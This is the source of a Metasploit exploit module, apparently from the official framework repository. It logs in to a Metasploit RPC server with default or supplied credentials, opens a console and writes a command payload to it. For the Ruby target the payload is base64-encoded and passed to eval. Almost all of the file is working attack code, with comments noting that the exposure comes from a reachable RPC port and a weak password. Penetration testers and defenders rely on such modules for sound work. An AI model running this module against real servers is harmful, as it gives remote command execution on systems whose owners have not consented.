GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
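# Metasploit module that runs a payload through a Metasploit RPC server.
#
# It logs in with the supplied USERNAME and PASSWORD, opens a console with the
# 'console.create' procedure, writes the payload command to that console with
# 'console.write', and removes the console again in #cleanup.
#
# The module relies on valid credentials rather than on a software flaw: it
# aborts with Failure::NoAccess when the login yields no token. What it
# demonstrates is the exposure of an RPC listener that is reachable and
# protected by guessable or leaked credentials, so the controls that matter
# are network reachability of the RPC port and the strength of its password.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata, its three targets and its options.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit RPC Console Command Execution',
        'Description' => %q{
          This module connects to a specified Metasploit RPC server and
          uses the 'console.write' procedure to execute operating
          system commands. Valid credentials are required to access the
          RPC interface.

          This module has been tested successfully on Metasploit 4.15
          on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
          4.14 on Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => 'bcoles',
        'References' => [
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
        ],
        'Platform' => %w{ruby unix win},
        'Targets' => [
          [
            'Ruby', {
              'Arch' => ARCH_RUBY,
              'Platform' => 'ruby',
              'Payload' => { 'BadChars' => "\x00" }
            }
          ],
          [
            'Windows CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'win',
              # CR and LF are excluded because the command is written to the
              # console wrapped in "\r\n" (see #execute_command).
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
            }
          ],
          [
            'Unix CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }
            }
          ]
        ],
        'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
        'Privileged' => false,
        'DisclosureDate' => '2011-05-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    # RPORT defaults to 55552, USERNAME to 'msf', PASSWORD to the empty string
    # and SSL to true.
    register_options [
      Opt::RPORT(55552),
      OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
      OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
      OptBool.new('SSL', [ true, 'Use SSL', true])
    ]
  end

  # Writes one command line to the console created by #exploit.
  #
  # A nil reply aborts the module; a reply whose 'wrote' field is not a plain
  # integer is printed as an error and the method returns without raising.
  #
  # @param cmd [String] command line to send, wrapped in "\r\n" on both sides
  # @param opts [Hash] unused; kept for the execute_command interface
  # @return [void]
  def execute_command(cmd, opts = {})
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

    fail_with Failure::Unknown, 'Connection failed' if res.nil?

    # 'wrote' is expected to be a byte count; anything else is treated as an
    # error reply and shown in full.
    unless res['wrote'].to_s =~ /\A\d+\z/
      print_error "Could not write to console #{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Wrote #{res['wrote']} bytes to console"
  end

  # Connects, authenticates, reports the server version, creates a console and
  # sends the payload command for the selected target platform.
  #
  # @return [void]
  def exploit
    begin
      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
    rescue Rex::ConnectionRefused
      fail_with Failure::Unreachable, 'Connection refused'
    rescue => e
      fail_with Failure::Unknown, "Connection failed: #{e}"
    end

    @rpc.login datastore['USERNAME'], datastore['PASSWORD']

    # Success is judged by the presence of a token, not by the login reply.
    fail_with Failure::NoAccess, 'Authentication failed' if @rpc.token.nil?

    print_good 'Authenticated successfully'
    # NOTE(review): this prints a live RPC token in verbose mode, so anything
    # that captures console output or spooled logs will hold it.
    vprint_status "Received temporary token: #{@rpc.token}"

    version = @rpc.call 'core.version'

    # Check the reply that is dereferenced below. The original tested the
    # login result here, so a nil version reply raised NoMethodError.
    fail_with Failure::Unknown, 'Connection failed' if version.nil?

    print_status "Metasploit #{version['version']}"
    print_status "Ruby #{version['ruby']}"
    print_status "API version #{version['api']}"

    vprint_status 'Creating new console...'
    res = @rpc.call 'console.create'

    fail_with Failure::Unknown, 'Connection failed' if res.nil?

    # The console id must be a plain integer; otherwise show the reply and stop.
    unless res['id'].to_s =~ /\A\d+\z/
      print_error 'Could not create console:'
      print_line res.to_s
      return
    end

    @console_id = res['id']
    print_good "Created console ##{@console_id}"

    print_status 'Sending payload...'

    case target['Platform']
    when 'ruby'
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
    when 'win', 'unix'
      cmd = payload.encoded
    else
      fail_with Failure::NoTarget, 'Invalid target'
    end

    execute_command cmd
  end

  # Destroys the console created by #exploit, if any, and closes the RPC client.
  #
  # @return [void]
  def cleanup
    return if @console_id.nil?

    vprint_status 'Removing console...'
    res = @rpc.call 'console.destroy', @console_id

    if res.nil?
      print_error 'Connection failed'
      return
    end

    unless res['result'].eql? 'success'
      print_warning "Could not destroy console ##{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Destroyed console ##{@console_id}"
  ensure
    # The ensure clause also runs on the early returns above. @rpc is still nil
    # when the client was never constructed, so guard the call instead of
    # raising NoMethodError from cleanup.
    @rpc.close unless @rpc.nil?
  end
end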